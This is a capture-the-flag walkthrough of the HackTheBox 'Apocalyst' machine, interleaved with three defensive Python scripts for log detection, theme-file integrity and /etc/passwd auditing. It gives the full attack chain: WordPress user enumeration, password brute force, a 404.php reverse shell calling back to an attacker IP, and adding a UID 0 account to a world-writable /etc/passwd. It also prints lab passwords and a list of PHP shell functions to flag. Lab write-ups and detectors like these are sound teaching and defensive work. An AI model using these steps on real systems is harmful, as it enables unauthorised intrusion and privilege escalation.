hackthebox – apocalyst – Linux

Starting with masscan

# masscan -e tun0 -p1-65535 10.10.10.46 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-06-27 16:38:49 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.10.10.46
Discovered open port 22/tcp on 10.10.10.46

Two ports are open: 80 (web) and 22 (SSH).

Browsing the web server, we see WordPress, but the site does not render correctly.


To view it correctly, we need to add the following entry to our /etc/hosts file:

10.10.10.46 www.apocalyst.htb apocalyst.htb

Then we browse the site again and it renders properly.


We can go to http://10.10.10.46/?author=1 to enumerate WordPress users by author ID. This reveals the user falaraki.

We then use gobuster to find other pages, but every path it tries returns a 301 redirect to the same page.


We use the cewl tool to generate a wordlist from the words on the main page:

# cewl -m 5 -w wordlist.txt http://10.10.10.46/

We then feed that wordlist to gobuster again:

# gobuster -u http://10.10.10.46 -w wordlist.txt -t 30  -f -l
/glorification/ (Status: 200) [Size: 157]
/given/ (Status: 200) [Size: 157]
/Rightiousness/ (Status: 200) [Size: 175]
/Psalms/ (Status: 200) [Size: 157]
/Sheol/ (Status: 200) [Size: 157]
/consigned/ (Status: 200) [Size: 157]

Here,
-f appends a / to each word, so directories are requested directly
-l includes the response body length (size) in the output

Every directory returns 157 bytes except one: /Rightiousness/ returns a different size, 175 bytes.
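From the defender's side, both steps above leave a clear trace in the web server's access log: the ?author=N probe, and a burst of 301/404 responses for many distinct paths from one client in a short time. The following Python script is an added example, not part of the original writeup: it parses Apache/nginx combined-format log lines and flags both patterns. The sample lines are constructed, not real traffic, and the thresholds (5 distinct paths within 60 seconds) are assumptions to be tuned per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" access-log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# WordPress answers /?author=N with a 301 to /author/<login>/, leaking the login name.
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')

# Constructed sample (not real traffic): one ordinary visitor, and one client that
# probes author IDs and then walks a wordlist of directory names.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jun/2019:16:40:01 +0000] "GET / HTTP/1.1" 200 5123
10.0.0.5 - - [27/Jun/2019:16:40:03 +0000] "GET /wp-content/themes/twentyseventeen/style.css HTTP/1.1" 200 77102
10.10.14.21 - - [27/Jun/2019:16:41:10 +0000] "GET /?author=1 HTTP/1.1" 301 0
10.10.14.21 - - [27/Jun/2019:16:41:11 +0000] "GET /?author=2 HTTP/1.1" 404 157
10.10.14.21 - - [27/Jun/2019:16:42:00 +0000] "GET /glorification HTTP/1.1" 301 0
10.10.14.21 - - [27/Jun/2019:16:42:00 +0000] "GET /given HTTP/1.1" 301 0
10.10.14.21 - - [27/Jun/2019:16:42:01 +0000] "GET /Psalms HTTP/1.1" 301 0
10.10.14.21 - - [27/Jun/2019:16:42:01 +0000] "GET /Sheol HTTP/1.1" 301 0
10.10.14.21 - - [27/Jun/2019:16:42:02 +0000] "GET /consigned HTTP/1.1" 301 0
10.10.14.21 - - [27/Jun/2019:16:42:02 +0000] "GET /Rightiousness HTTP/1.1" 301 0
"""


def parse_log(text):
    """Return a list of (ip, timestamp, path, status) for each well-formed line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        events.append((m.group("ip"), ts, m.group("path"), int(m.group("status"))))
    return events


def author_enumeration(events):
    """Map each client to the sorted author IDs it probed (empty dict = nothing seen)."""
    hits = defaultdict(set)
    for ip, _, path, _ in events:
        m = AUTHOR_RE.search(path)
        if m:
            hits[ip].add(int(m.group(1)))
    return {ip: sorted(ids) for ip, ids in hits.items()}


def path_bruteforce(events, window_seconds=60, min_paths=5):
    """Clients that request at least min_paths distinct paths answered 301/404
    inside any window_seconds-long window. Query strings are dropped so that
    /?author=1 and /?author=2 count as the same path."""
    by_ip = defaultdict(list)
    for ip, ts, path, status in events:
        if status in (301, 404):
            by_ip[ip].append((ts, path.split("?", 1)[0]))
    flagged = {}
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            in_window = {p for t, p in reqs[i:] if (t - start).total_seconds() <= window_seconds}
            if len(in_window) >= min_paths:
                flagged[ip] = len(in_window)  # distinct paths in the first offending window
                break
    return flagged


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("author enumeration:", author_enumeration(ev))
    print("path brute force:", path_bruteforce(ev))
```

On the sample, the visitor at 10.0.0.5 is never flagged, while 10.10.14.21 shows up in both checks: two author IDs probed, and seven distinct redirected paths inside one minute. A real deployment would read the log file incrementally and feed these findings to whatever alerting the site already has.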

Browsing to http://apocalyst.htb/Rightiousness/ shows the same image as everywhere else.


But this time, if we view the page source, we see the following:

<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">

  <title>End of the world</title>
</head>

<body>
  <img src="image.jpg">
  <!-- needle -->
</body>
</html>

Notice the <!-- needle --> comment, a hint that something is hidden in the image.

We use the steghide tool to check whether any data is hidden in the image:

# steghide --extract -sf image.jpg 
Enter passphrase: 
wrote extracted data to "list.txt".

Note: there is no passphrase; just press ENTER at the prompt.

This extracts a file called list.txt. We now use it as a password list against the WordPress login for user falaraki:

# wpscan --url http://10.10.10.46 --wordlist /root/htb/apocalyst/list.txt --username falaraki

wpscan finds the password: Transclisiation

We can now log in to the WordPress dashboard.


Go to Appearance -> Editor and replace the contents of 404.php with the reverse shell from /usr/share/webshells/php/php-reverse-shell.php, editing the following lines:

$ip = '10.10.14.21';  // CHANGE THIS
$port = 5353;       // CHANGE THIS

Then start a listener for the reverse shell:

# nc -lvnp 5353

Then browse to http://apocalyst.htb/wp-content/themes/twentyseventeen/404.php to trigger it.

You will get the shell:

# nc -lvnp 5353
listening on [any] 5353 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.46] 35008
Linux apocalyst 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 06:44:49 up 5 days,  5:20,  0 users,  load average: 0.00, 0.08, 0.07
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
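The theme editor step is what a defender most wants to catch: a template file on disk changing after the site went live, and a PHP file that suddenly opens sockets or processes. The script below is an added example, not from the writeup or from WordPress itself. It hashes a theme directory into a baseline, diffs a later snapshot against it, and scans changed or new files for process- and socket-related PHP calls. The demo() function builds a throwaway theme directory in a temp folder (constructed, not a real install) so the whole thing runs offline; the list of flagged function names is an assumption, not an exhaustive web-shell signature.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# PHP calls a theme template has no reason to make. fsockopen plus proc_open is
# precisely the pair a network-connecting shell script needs.
SUSPICIOUS_CALLS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|exec|system|eval)\s*\(")


def hash_tree(root):
    """Map every file under root (relative path) to its SHA-256 hex digest."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(p for p in root.rglob("*") if p.is_file())
    }


def diff_baseline(baseline, current):
    """Files whose digest changed, that appeared, or that vanished since the baseline."""
    return {
        "changed": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def suspicious_calls(root, files):
    """For each listed file, the sorted set of flagged PHP functions it calls."""
    return {
        f: sorted(set(SUSPICIOUS_CALLS.findall((Path(root) / f).read_text(errors="replace"))))
        for f in files
    }


def demo():
    """Constructed scenario in a temp dir: baseline a tiny theme, then tamper with 404.php."""
    with tempfile.TemporaryDirectory() as theme:
        Path(theme, "index.php").write_text("<?php get_header(); ?>\n")
        Path(theme, "404.php").write_text("<?php get_header(); ?>\n<h1>Not found</h1>\n")
        baseline = hash_tree(theme)  # in practice: taken at deploy time, stored off the web root
        # The tampered template now opens a socket and a process. This is a constructed
        # stand-in containing only the call names, not a working shell.
        Path(theme, "404.php").write_text(
            "<?php $s = fsockopen($h, $p); proc_open('sh', $d, $pipes); ?>\n")
        Path(theme, "extra.php").write_text("<?php echo 'hi'; ?>\n")
        report = diff_baseline(baseline, hash_tree(theme))
        report["calls"] = suspicious_calls(theme, report["changed"] + report["added"])
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run against the real wp-content/themes directory, hash_tree gives a baseline to store outside the web root and re-check on a schedule; any "changed" or "added" entry that also has non-empty "calls" is worth an immediate look, and a modified 404.php with fsockopen and proc_open in it is exactly the artefact the step above leaves behind.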

Go to the user's home directory:

$ cd /home/falaraki
$ ls -thal
total 44K
-rw------- 1 falaraki falaraki  516 Jul 27  2017 .bash_history
drwxr-xr-x 4 falaraki falaraki 4.0K Jul 27  2017 .
-rw-r--r-- 1 root     root     1.0K Jul 27  2017 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26  2017 .secret
-rw-rw-r-- 1 falaraki falaraki   33 Jul 26  2017 user.txt
drwxrwxr-x 2 falaraki falaraki 4.0K Jul 26  2017 .nano
-rw-r--r-- 1 falaraki falaraki    0 Jul 26  2017 .sudo_as_admin_successful
drwx------ 2 falaraki falaraki 4.0K Jul 26  2017 .cache
-rw-r--r-- 1 falaraki falaraki 3.7K Jul 26  2017 .bashrc
-rw-r--r-- 1 falaraki falaraki  655 Jul 26  2017 .profile
-rw-r--r-- 1 falaraki falaraki  220 Jul 26  2017 .bash_logout
drwxr-xr-x 3 root     root     4.0K Jul 26  2017 ..
$ cat .secret
S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=

# echo S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M= | base64 -d
Keep forgetting password so this will keep it safe!
Y0uAINtG37TiNgTH!sUzersP4ss

We now have the user's password and can log in over SSH:

# ssh falaraki@10.10.10.46
falaraki@10.10.10.46's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

120 packages can be updated.
61 updates are security updates.


Last login: Thu Jul 27 12:09:11 2017 from 10.0.2.15
falaraki@apocalyst:~$

Running LinEnum, we see that /etc/passwd is world-writable:

-rw-rw-rw- 1 root root 1.6K Jul 26  2017 /etc/passwd

We can therefore add another user with UID 0 (root privileges). First generate a password hash with the openssl tool:

$ openssl passwd -1 -salt hacker hacker 
$1$hacker$TzyKlv0/R/c28R.GAeLw.1

Here, the user we are adding is hacker and the password is also hacker.

Put the hash into the following line and append it to /etc/passwd:

hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash

Then switch to the new user:

$ su hacker
Password:  hacker
[email protected]:/home/falaraki#
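The world-writable /etc/passwd is the root cause here, and the appended line is the artefact it leaves behind. The following Python audit is an added example, not from the writeup: it checks the file's mode bits and flags passwd entries that carry UID 0 under a name other than root, or that hold a password hash in the second field (where an "x" pointing to /etc/shadow is expected). SAMPLE_PASSWD is a constructed file built around the entry added above, and demo_mode_check() writes it to a temp file with the same 0666 mode the box had so the permission check can be exercised offline.

```python
import os
import stat
import tempfile

# Constructed sample of /etc/passwd after the step above: the appended "hacker"
# entry has UID 0 and carries its MD5-crypt hash in passwd itself.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
falaraki:x:1000:1000:falaraki,,,:/home/falaraki:/bin/bash
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash
"""

# Values that mean "no usable password here, consult /etc/shadow" (or account locked).
PLACEHOLDER_PW = {"x", "*", "!"}


def audit_passwd_content(text):
    """Return human-readable findings for a passwd-format string (empty list = clean)."""
    findings = []
    names = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in names:
            findings.append(f"line {lineno}: duplicate account name '{name}'")
        names.add(name)
        if not uid.isdigit():
            findings.append(f"line {lineno}: non-numeric UID '{uid}' for '{name}'")
            continue
        if int(uid) == 0 and name != "root":
            findings.append(f"line {lineno}: account '{name}' has UID 0 (root-equivalent)")
        if pw == "":
            findings.append(f"line {lineno}: account '{name}' has an empty password")
        elif pw not in PLACEHOLDER_PW:
            findings.append(f"line {lineno}: account '{name}' stores a password hash in passwd, not shadow")
    return findings


def audit_passwd_mode(path="/etc/passwd"):
    """Findings about ownership and permission bits; the file should be root:root 0644."""
    st = os.stat(path)
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by group or others ({stat.filemode(st.st_mode)})")
    return findings


def demo_mode_check():
    """Constructed: write SAMPLE_PASSWD to a temp file with the box's 0666 mode and audit it."""
    with tempfile.NamedTemporaryFile("w", delete=False) as f:
        f.write(SAMPLE_PASSWD)
        path = f.name
    try:
        os.chmod(path, 0o666)
        return any("writable" in m for m in audit_passwd_mode(path))
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for finding in audit_passwd_content(SAMPLE_PASSWD):
        print(finding)
    print("world-writable sample detected:", demo_mode_check())
```

On the sample, the audit reports exactly two findings, both on the hacker line: a second UID 0 account and a hash sitting in passwd rather than shadow. Restoring mode 0644 on /etc/passwd removes the precondition; the content check is what catches the account if it was added before the permissions were fixed.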
